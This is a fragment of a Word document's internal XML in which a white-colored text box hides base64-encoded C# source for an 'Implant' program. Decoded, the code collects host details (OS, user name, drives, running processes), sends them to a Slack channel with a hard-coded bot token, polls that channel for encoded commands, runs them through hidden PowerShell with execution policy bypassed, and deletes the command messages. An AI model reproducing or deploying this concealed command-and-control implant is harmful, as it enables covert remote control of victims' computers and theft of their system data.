LkluZGV4T2YoInRleHQiKSArIDc7CiAgICAgICAgICAgICAgICBpZiAoYmVnaW5faWR4ID09IDYpCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgVGhyZWFkLlNsZWVwKDUwMDApOwogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgaW50IGVuZF9pZHggPSByZXMuU3Vic3RyaW5nKGJlZ2luX2lkeCkuSW5kZXhPZigiXCIiKTsKICAgICAgICAgICAgICAgIFN0cmluZyBwYXlsb2FkID0gcmVzLlN1YnN0cmluZyhiZWdpbl9pZHgsIGVuZF9pZHgpOwoKICAgICAgICAgICAgICAgIFN0cmluZyB0cyA9ICIiOwogICAgICAgICAgICAgICAgYmVnaW5faWR4ID0gcmVzLkluZGV4T2YoIlwidHNcIjoiKSArIDY7CiAgICAgICAgICAgICAgICBpZiAoYmVnaW5faWR4ICE9IDUpIAogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgIGVuZF9pZHggPSByZXMuU3Vic3RyaW5nKGJlZ2luX2lkeCkuSW5kZXhPZigiXCIiKTsKICAgICAgICAgICAgICAgICAgICB0cyA9IHJlcy5TdWJzdHJpbmcoYmVnaW5faWR4LCBlbmRfaWR4KTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBTdHJpbmcgYXJncyA9IERlY29kZUZyb202NChwYXlsb2FkKTsKICAgICAgICAgICAgICAgIFByb2Nlc3MgcHMgPSBuZXcgUHJvY2VzcygpOwogICAgICAgICAgICAgICAgcHMuU3RhcnRJbmZvLkNyZWF0ZU5vV2luZG93ID0gdHJ1ZTsKICAgICAgICAgICAgICAgIHBzLlN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47CiAgICAgICAgICAgICAgICBwcy5TdGFydEluZm8uRmlsZU5hbWUgPSAiQzpcXFdpbmRvd3NcXFN5c3RlbTMyXFxXaW5kb3dzUG93ZXJTaGVsbFxcdjEuMFxccG93ZXJzaGVsbC5leGUiOwogICAgICAgICAgICAgICAgcHMuU3RhcnRJbmZvLkFyZ3VtZW50cyA9ICItbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13aW5kb3dzdHlsZSBoaWRkZW4gLWVuY29kZWRjb21tYW5kICIrcGF5bG9hZDsKICAgICAgICAgICAgICAgIHBzLlN0YXJ0SW5mby5Bcmd1bWVudHMgPSAiIC1lbmNvZGVkY29tbWFuZCAiK3BheWxvYWQ7CiAgICAgICAgICAgICAgICBwcy5TdGFydCgpOwogICAgICAgICAgICAgICAgcHMuV2FpdEZvckV4aXQoKTsKICAgICAgICAgICAgICAgIHVybCA9ICJodHRwczovL3NsYWNrLmNvbS9hcGkvY2hhdC5kZWxldGUiOwogICAgICAgICAgICAgICAgd2IuSGVhZGVyc1tIdHRwUmVxdWVzdEhlYWRlci5Db250ZW50VHlwZV0gPSAiYXBwbGljYXRpb24vanNvbiI7CiAgICAgICAgICAgICAgICB3Yi5VcGxvYWRTdHJpbmcodXJsLCAie1wiY2hhbm5lbFwiOlwiQzAyUkQ1S1NNSzZcIiwgXCJ0c1wiOlwiIiArIHRzICsgIlwifSIpOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgIH0KICAgICAgICB9CgogICAgICAgIHB1YmxpYyBzdGF0aWMgU3RyaW5nIGdldFN5c3RlbUluZm8oKQogICAgICAgIHsKICAgICAgICAgICAgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBzeXN0ZW1JbmZvID0gbmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIoc3RyaW5nLkVtcHR5KTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmQoIntcInR5cGVcIjpcIjJuZHN0YWdlXCIsIFwiZGF0YVwiOnsiKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiT3BlcmF0aW9uIFN5c3RlbVwiOiAgXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5PU1ZlcnNpb24pOwogICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiXCJQcm9jZXNzb3IgQXJjaGl0ZWN0dXJlXCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LkdldEVudmlyb25tZW50VmFyaWFibGUoIlBST0NFU1NPUl9BUkNISVRFQ1RVUkUiKSk7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIlByb2Nlc3NvciBNb2RlbFwiOiAgXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5HZXRFbnZpcm9ubWVudFZhcmlhYmxlKCJQUk9DRVNTT1JfSURFTlRJRklFUiIpKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiUHJvY2Vzc29yIExldmVsXCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LkdldEVudmlyb25tZW50VmFyaWFibGUoIlBST0NFU1NPUl9MRVZFTCIpKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiU3lzdGVtRGlyZWN0b3J5XCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LlN5c3RlbURpcmVjdG9yeS5SZXBsYWNlKCJcXCIsICJcXFxcIikpOwogICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiXCJQcm9jZXNzb3JDb3VudFwiOiAgXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5Qcm9jZXNzb3JDb3VudCk7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIlVzZXJEb21haW5OYW1lXCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LlVzZXJEb21haW5OYW1lKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiVXNlck5hbWVcIjogXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5Vc2VyTmFtZSk7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIkxvZ2ljYWxEcml2ZXNcIjogWyIpOwogICAgICAgICAgICBib29sIGZpcnN0ID0gdHJ1ZTsKICAgICAgICAgICAgU3RyaW5nIHNlcCA9ICIiOwogICAgICAgICAgICBmb3JlYWNoIChTeXN0ZW0uSU8uRHJpdmVJbmZvIERyaXZlSW5mbzEgaW4gU3lzdGVtLklPLkRyaXZlSW5mby5HZXREcml2ZXMoKSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgdHJ5CiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoInswfXt7XCJEcml2ZVwiOiBcInsxfVwiLCBcIlZvbHVtZUxhYmVsXCI6ICIgKwogICAgICAgICAgICAgICAgICAgICAgICAiXCJ7Mn1cIiwgXCJEcml2ZVR5cGVcIjogXCJ7M31cIiwgXCJEcml2ZUZvcm1hdFwiOiBcIns0fVwiLCAiICsKICAgICAgICAgICAgICAgICAgICAgICAgIlwiVG90YWxTaXplXCI6IFwiezV9XCIsIFwiQXZhaWxhYmxlRnJlZVNwYWNlXCI6IFwiezZ9XCJ9fSIsCiAgICAgICAgICAgICAgICAgICAgICAgIHNlcCwgRHJpdmVJbmZvMS5OYW1lLlJlcGxhY2UoIlxcIiwgIlxcXFwiKSwgRHJpdmVJbmZvMS5Wb2x1bWVMYWJlbCwgRHJpdmVJbmZvMS5Ecml2ZVR5cGUsCiAgICAgICAgICAgICAgICAgICAgICAgIERyaXZlSW5mbzEuRHJpdmVGb3JtYXQsIERyaXZlSW5mbzEuVG90YWxTaXplLCBEcml2ZUluZm8xLkF2YWlsYWJsZUZyZWVTcGFjZSk7CiAgICAgICAgICAgICAgICAgICAgaWYgKGZpcnN0KQogICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgZmlyc3QgPSBmYWxzZTsKICAgICAgICAgICAgICAgICAgICAgICAgc2VwID0gIiwiOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGNhdGNoCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICB9CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJdLFxuIik7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIlZlcnNpb25cIjogIFwiezB9XCIsIiwgRW52aXJvbm1lbnQuVmVyc2lvbik7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kKCJcIlByb2Nlc3Nlc1wiOlsiKTsKICAgICAgICAgICAgUHJvY2Vzc1tdIHByb2Nlc3NsaXN0ID0gUHJvY2Vzcy5HZXRQcm9jZXNzZXMoKTsKICAgICAgICAgICAgZmlyc3QgPSB0cnVlOwogICAgICAgICAgICBzZXAgPSAiIjsKICAgICAgICAgICAgZm9yZWFjaCAoUHJvY2VzcyB0aGVwcm9jZXNzIGluIHByb2Nlc3NsaXN0KQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICB0cnkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiezB9e3tcIk5hbWVcIjogXCJ7MX1cIiwgXCJTdGFydCBUaW1lXCI6IFwiezJ9XCIsIFwiUGF0aFwiOiBcInszfVwifX0iLCBzZXAsIHRoZXByb2Nlc3MuUHJvY2Vzc05hbWUsIHRoZXByb2Nlc3MuU3RhcnRUaW1lLCB0aGVwcm9jZXNzLk1haW5Nb2R1bGUuRmlsZU5hbWUuUmVwbGFjZSgiXFwiLCAiXFxcXCIpKTsKICAgICAgICAgICAgICAgIH0gY2F0Y2gKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiezB9e3tcIlByb2Nlc3NcIjogXCJ7MX1cIn19Iiwgc2VwLCB0aGVwcm9jZXNzLlByb2Nlc3NOYW1lKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGlmIChmaXJzdCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBmaXJzdCA9IGZhbHNlOwogICAgICAgICAgICAgICAgICAgIHNlcCA9ICIsIjsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZCgiXX19Iik7CiAgICAgICAgICAgIHJldHVybiBFbmNvZGVUbzY0KHN5c3RlbUluZm8uVG9TdHJpbmcoKSk7CiAgICAgICAgfQoKICAgICAgICBzdGF0aWMgcHVibGljIHN0cmluZyBFbmNvZGVUbzY0KHN0cmluZyB0b0VuY29kZSkKICAgICAgICB7CiAgICAgICAgICAgIGJ5dGVbXSB0b0VuY29kZUFzQnl0ZXMgPSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nLkFTQ0lJLkdldEJ5dGVzKHRvRW5jb2RlKTsKICAgICAgICAgICAgc3RyaW5nIGVuY29kZWQgPSBDb252ZXJ0LlRvQmFzZTY0U3RyaW5nKHRvRW5jb2RlQXNCeXRlcyk7CiAgICAgICAgICAgIHJldHVybiBlbmNvZGVkOwogICAgICAgIH0KICAgICAgICBzdGF0aWMgcHVibGljIHN0cmluZyBEZWNvZGVGcm9tNjQoc3RyaW5nIHRvRGVjb2RlKQogICAgICAgIHsKICAgICAgICAgICAgYnl0ZVtdIGRlY29kZUFzQnl0ZXMgID0gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKHRvRGVjb2RlKTsKICAgICAgICAgICAgU3RyaW5nIGRlY29kZWQgPSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nLkFTQ0lJLkdldFN0cmluZyhkZWNvZGVBc0J5dGVzKTsKICAgICAgICAgICAgcmV0dXJuIGRlY29kZWQ7CiAgICAgICAgfQogICAgfQp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-22.6pt;margin-top:502.35pt;width:48.45pt;height:19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y0SIwIAACIEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8tu2zAQvBfoPxC813rUdhzBcpA6TVEg&#10;fQBJP4CiKIsoyWVJ2pL79V1SjmOkt6I6CFxyOTs7O1zfjFqRg3BegqlpMcspEYZDK82upj+e7t+t&#10;KPGBmZYpMKKmR+Hpzebtm/VgK1FCD6oVjiCI8dVga9qHYKss87wXmvkZWGHwsAOnWcDQ7bLWsQHR&#10;tcrKPF9mA7jWOuDCe9y9mw7pJuF3neDhW9d5EYiqKXIL6e/Sv4n/bLNm1c4x20t+osH+gYVm0mDR&#10;M9QdC4zsnfwLSkvuwEMXZhx0Bl0nuUg9YDdF/qqbx55ZkXpBcbw9y+T/Hyz/evjuiGxr+j6/osQw&#10;jUN6EmMgH2AkZdRnsL7CtEeLiWHEbZxz6tXbB+A/PTGw7ZnZiVvnYOgFa5FfEW9mF1cnHB9BmuEL&#10;tFiG7QMkoLFzOoqHchBExzkdz7OJVDhuLotFMS8p4XhUzhfL1VWqwKrny9b58EmAJnFRU4ejT+Ds&#10;8OBDJMOq55RYy4OS7b1UKgXRbmKrHDkwNEqzm+i/ylKGDDW9XpSLBGwgXk8G0jKgi5XUNV3l8Zt8&#10;FbX4aNqUEphU0xqJKHMSJ+oxKRPGZkxzSKWjcA20R1TLwWRafGS46MH9pmRAw9bU/9ozJyhRnw0q&#10;fl3M59HhKZgvrkoM3OVJc3nCDEeomgZKpuU2pFcR1TBwi5PpZFLthcmJMhoxiXl6NNHpl3HKenna&#10;mz8AAAD//wMAUEsDBBQABgAIAAAAIQBGBkUN4AAAAAwBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9B&#10;T8MwDIXvSPyHyEjctmSjY1NpOgESFy5oY+KcNqYpa5yqydbCr8c7wcmy39Pz94rt5DtxxiG2gTQs&#10;5goEUh1sS42Gw/vLbAMiJkPWdIFQwzdG2JbXV4XJbRhph+d9agSHUMyNBpdSn0sZa4fexHnokVj7&#10;DIM3idehkXYwI4f7Ti6VupfetMQfnOnx2WF93J+8ho/mC5/a1+FHvUk1Hjdhd6jWTuvbm+nxAUTC&#10;Kf2Z4YLP6FAyUxVOZKPoNMyy1ZKtLCiVrUGwZbXgWV0u2V0Gsizk/xLlLwAAAP//AwBQSwECLQAU&#10;AAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnht&#10;bFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVs&#10;c1BLAQItABQABgAIAAAAIQCnBy0SIwIAACIEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9j&#10;LnhtbFBLAQItABQABgAIAAAAIQBGBkUN4AAAAAwBAAAPAAAAAAAAAAAAAAAAAH0EAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABADzAAAAigUAAAAA&#10;" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E38792A" w14:textId="5603161A" w:rsidR="00F4725A" w:rsidRPr="00967A12" w:rsidRDefault="00694955">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00694955">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        </w:rPr>
                        <w:t>dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYzsKdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5OZXQ7CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CgpuYW1lc3BhY2UgSW1wbGFudAp7CiAgICBwdWJsaWMgY2xhc3MgUHJvZ3JhbQogICAgewogICAgICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgICAgICB7CiAgICAgICAgICAgIFN0cmluZyBtc2cgPSBnZXRTeXN0ZW1JbmZvKCk7CiAgICAgICAgICAgIHNlbmRNc2cobXNnKTsKICAgICAgICB9CgogICAgICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBzZW5kTXNnKFN0cmluZyBtc2cpCiAgICAgICAgewogICAgICAgICAgICBTdHJpbmcgdXJsID0gImh0dHBzOi8vc2xhY2suY29tL2FwaS9jaGF0LnBvc3RNZXNzYWdlIjsKICAgICAgICAgICAgV2ViQ2xpZW50IHdiID0gbmV3IFdlYkNsaWVudCgpOwogICAgICAgICAgICB3Yi5IZWFkZXJzW0h0dHBSZXF1ZXN0SGVhZGVyLkNvbnRlbnRUeXBlXSA9ICJhcHBsaWNhdGlvbi9qc29uIjsKICAgICAgICAgICAgd2IuSGVhZGVyc1tIdHRwUmVxdWVzdEhlYWRlci5BdXRob3JpemF0aW9uXSA9ICJCZWFyZXIgeG94Yi0yODQ1OTgwOTE1MjIzLTI4NjA1OTA3NzkwNDItTTBPbU9UNFNxb1NlZ1ozZkJNVmlLQjB4IjsKICAgICAgICAgICAgd2IuVXBsb2FkU3RyaW5nKHVybCwgIntcImNoYW5uZWxcIjpcIkMwMlI0NkhKUVQwXCIsIFwidGV4dFwiOlwiIiArIG1zZyArIlwifSIpOwoKICAgICAgICAgICAgd2hpbGUgKHRydWUpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIFN0cmluZyByZXMgPSB3Yi5Eb3dubG9hZFN0cmluZygiaHR0cHM6Ly9zbGFjay5jb20vYXBpL2NvbnZlcnNhdGlvbnMuaGlzdG9yeT9jaGFubmVsPUMwMlJENUtTTUs2Iik7CiAgICAgICAgICAgICAgICBpbnQgYmVnaW5faWR4ID0gcmVzLkluZGV4T2YoInRleHQiKSArIDc7CiAgICAgICAgICAgICAgICBpZiAoYmVnaW5faWR4ID09IDYpCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgVGhyZWFkLlNsZWVwKDUwMDApOwogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgaW50IGVuZF9pZHggPSByZXMuU3Vic3RyaW5nKGJlZ2luX2lkeCkuSW5kZXhPZigiXCIiKTsKICAgICAgICAgICAgICAgIFN0cmluZyBwYXlsb2FkID0gcmVzLlN1YnN0cmluZyhiZWdpbl9pZHgsIGVuZF9pZHgpOwoKICAgICAgICAgICAgICAgIFN0cmluZyB0cyA9ICIiOwogICAgICAgICAgICAgICAgYmVnaW5faWR4ID0gcmVzLkluZGV4T2YoIlwidHNcIjoiKSArIDY7CiAgICAgICAgICAgICAgICBpZiAoYmVnaW5faWR4ICE9IDUpIAogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgIGVuZF9pZHggPSByZXMuU3Vic3RyaW5nKGJlZ2luX2lkeCkuSW5kZXhPZigiXCIiKTsKICAgICAgICAgICAgICAgICAgICB0cyA9IHJlcy5TdWJzdHJpbmcoYmVnaW5faWR4LCBlbmRfaWR4KTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBTdHJpbmcgYXJncyA9IERlY29kZUZyb202NChwYXlsb2FkKTsKICAgICAgICAgICAgICAgIFByb2Nlc3MgcHMgPSBuZXcgUHJvY2VzcygpOwogICAgICAgICAgICAgICAgcHMuU3RhcnRJbmZvLkNyZWF0ZU5vV2luZG93ID0gdHJ1ZTsKICAgICAgICAgICAgICAgIHBzLlN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47CiAgICAgICAgICAgICAgICBwcy5TdGFydEluZm8uRmlsZU5hbWUgPSAiQzpcXFdpbmRvd3NcXFN5c3RlbTMyXFxXaW5kb3dzUG93ZXJTaGVsbFxcdjEuMFxccG93ZXJzaGVsbC5leGUiOwogICAgICAgICAgICAgICAgcHMuU3RhcnRJbmZvLkFyZ3VtZW50cyA9ICItbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13aW5kb3dzdHlsZSBoaWRkZW4gLWVuY29kZWRjb21tYW5kICIrcGF5bG9hZDsKICAgICAgICAgICAgICAgIHBzLlN0YXJ0SW5mby5Bcmd1bWVudHMgPSAiIC1lbmNvZGVkY29tbWFuZCAiK3BheWxvYWQ7CiAgICAgICAgICAgICAgICBwcy5TdGFydCgpOwogICAgICAgICAgICAgICAgcHMuV2FpdEZvckV4aXQoKTsKICAgICAgICAgICAgICAgIHVybCA9ICJodHRwczovL3NsYWNrLmNvbS9hcGkvY2hhdC5kZWxldGUiOwogICAgICAgICAgICAgICAgd2IuSGVhZGVyc1tIdHRwUmVxdWVzdEhlYWRlci5Db250ZW50VHlwZV0gPSAiYXBwbGljYXRpb24vanNvbiI7CiAgICAgICAgICAgICAgICB3Yi5VcGxvYWRTdHJpbmcodXJsLCAie1wiY2hhbm5lbFwiOlwiQzAyUkQ1S1NNSzZcIiwgXCJ0c1wiOlwiIiArIHRzICsgIlwifSIpOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgIH0KICAgICAgICB9CgogICAgICAgIHB1YmxpYyBzdGF0aWMgU3RyaW5nIGdldFN5c3RlbUluZm8oKQogICAgICAgIHsKICAgICAgICAgICAgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBzeXN0ZW1JbmZvID0gbmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIoc3RyaW5nLkVtcHR5KTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmQoIntcInR5cGVcIjpcIjJuZHN0YWdlXCIsIFwiZGF0YVwiOnsiKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiT3BlcmF0aW9uIFN5c3RlbVwiOiAgXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5PU1ZlcnNpb24pOwogICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiXCJQcm9jZXNzb3IgQXJjaGl0ZWN0dXJlXCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LkdldEVudmlyb25tZW50VmFyaWFibGUoIlBST0NFU1NPUl9BUkNISVRFQ1RVUkUiKSk7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIlByb2Nlc3NvciBNb2RlbFwiOiAgXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5HZXRFbnZpcm9ubWVudFZhcmlhYmxlKCJQUk9DRVNTT1JfSURFTlRJRklFUiIpKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiUHJvY2Vzc29yIExldmVsXCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LkdldEVudmlyb25tZW50VmFyaWFibGUoIlBST0NFU1NPUl9MRVZFTCIpKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiU3lzdGVtRGlyZWN0b3J5XCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LlN5c3RlbURpcmVjdG9yeS5SZXBsYWNlKCJcXCIsICJcXFxcIikpOwogICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiXCJQcm9jZXNzb3JDb3VudFwiOiAgXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5Qcm9jZXNzb3JDb3VudCk7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIlVzZXJEb21haW5OYW1lXCI6ICBcInswfVwiLCIsIEVudmlyb25tZW50LlVzZXJEb21haW5OYW1lKTsKICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoIlwiVXNlck5hbWVcIjogXCJ7MH1cIiwiLCBFbnZpcm9ubWVudC5Vc2VyTmFtZSk7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIkxvZ2ljYWxEcml2ZXNcIjogWyIpOwogICAgICAgICAgICBib29sIGZpcnN0ID0gdHJ1ZTsKICAgICAgICAgICAgU3RyaW5nIHNlcCA9ICIiOwogICAgICAgICAgICBmb3JlYWNoIChTeXN0ZW0uSU8uRHJpdmVJbmZvIERyaXZlSW5mbzEgaW4gU3lzdGVtLklPLkRyaXZlSW5mby5HZXREcml2ZXMoKSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgdHJ5CiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgc3lzdGVtSW5mby5BcHBlbmRGb3JtYXQoInswfXt7XCJEcml2ZVwiOiBcInsxfVwiLCBcIlZvbHVtZUxhYmVsXCI6ICIgKwogICAgICAgICAgICAgICAgICAgICAgICAiXCJ7Mn1cIiwgXCJEcml2ZVR5cGVcIjogXCJ7M31cIiwgXCJEcml2ZUZvcm1hdFwiOiBcIns0fVwiLCAiICsKICAgICAgICAgICAgICAgICAgICAgICAgIlwiVG90YWxTaXplXCI6IFwiezV9XCIsIFwiQXZhaWxhYmxlRnJlZVNwYWNlXCI6IFwiezZ9XCJ9fSIsCiAgICAgICAgICAgICAgICAgICAgICAgIHNlcCwgRHJpdmVJbmZvMS5OYW1lLlJlcGxhY2UoIlxcIiwgIlxcXFwiKSwgRHJpdmVJbmZvMS5Wb2x1bWVMYWJlbCwgRHJpdmVJbmZvMS5Ecml2ZVR5cGUsCiAgICAgICAgICAgICAgICAgICAgICAgIERyaXZlSW5mbzEuRHJpdmVGb3JtYXQsIERyaXZlSW5mbzEuVG90YWxTaXplLCBEcml2ZUluZm8xLkF2YWlsYWJsZUZyZWVTcGFjZSk7CiAgICAgICAgICAgICAgICAgICAgaWYgKGZpcnN0KQogICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgZmlyc3QgPSBmYWxzZTsKICAgICAgICAgICAgICAgICAgICAgICAgc2VwID0gIiwiOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGNhdGNoCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICB9CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJdLFxuIik7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kRm9ybWF0KCJcIlZlcnNpb25cIjogIFwiezB9XCIsIiwgRW52aXJvbm1lbnQuVmVyc2lvbik7CiAgICAgICAgICAgIHN5c3RlbUluZm8uQXBwZW5kKCJcIlByb2Nlc3Nlc1wiOlsiKTsKICAgICAgICAgICAgUHJvY2Vzc1tdIHByb2Nlc3NsaXN0ID0gUHJvY2Vzcy5HZXRQcm9jZXNzZXMoKTsKICAgICAgICAgICAgZmlyc3QgPSB0cnVlOwogICAgICAgICAgICBzZXAgPSAiIjsKICAgICAgICAgICAgZm9yZWFjaCAoUHJvY2VzcyB0aGVwcm9jZXNzIGluIHByb2Nlc3NsaXN0KQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICB0cnkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiezB9e3tcIk5hbWVcIjogXCJ7MX1cIiwgXCJTdGFydCBUaW1lXCI6IFwiezJ9XCIsIFwiUGF0aFwiOiBcInszfVwifX0iLCBzZXAsIHRoZXByb2Nlc3MuUHJvY2Vzc05hbWUsIHRoZXByb2Nlc3MuU3RhcnRUaW1lLCB0aGVwcm9jZXNzLk1haW5Nb2R1bGUuRmlsZU5hbWUuUmVwbGFjZSgiXFwiLCAiXFxcXCIpKTsKICAgICAgICAgICAgICAgIH0gY2F0Y2gKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZEZvcm1hdCgiezB9e3tcIlByb2Nlc3NcIjogXCJ7MX1cIn19Iiwgc2VwLCB0aGVwcm9jZXNzLlByb2Nlc3NOYW1lKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGlmIChmaXJzdCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBmaXJzdCA9IGZhbHNlOwogICAgICAgICAgICAgICAgICAgIHNlcCA9ICIsIjsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICAgICBzeXN0ZW1JbmZvLkFwcGVuZCgiXX19Iik7CiAgICAgICAgICAgIHJldHVybiBFbmNvZGVUbzY0KHN5c3RlbUluZm8uVG9TdHJpbmcoKSk7CiAgICAgICAgfQoKICAgICAgICBzdGF0aWMgcHVibGljIHN0cmluZyBFbmNvZGVUbzY0KHN0cmluZyB0b0VuY29kZSkKICAgICAgICB7CiAgICAgICAgICAgIGJ5dGVbXSB0b0VuY29kZUFzQnl0ZXMgPSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nLkFTQ0lJLkdldEJ5dGVzKHRvRW5jb2RlKTsKICAgICAgICAgICAgc3RyaW5nIGVuY29kZWQgPSBDb252ZXJ0LlRvQmFzZTY0U3RyaW5nKHRvRW5jb2RlQXNCeXRlcyk7CiAgICAgICAgICAgIHJldHVybiBlbmNvZGVkOwogICAgICAgIH0KICAgICAgICBzdGF0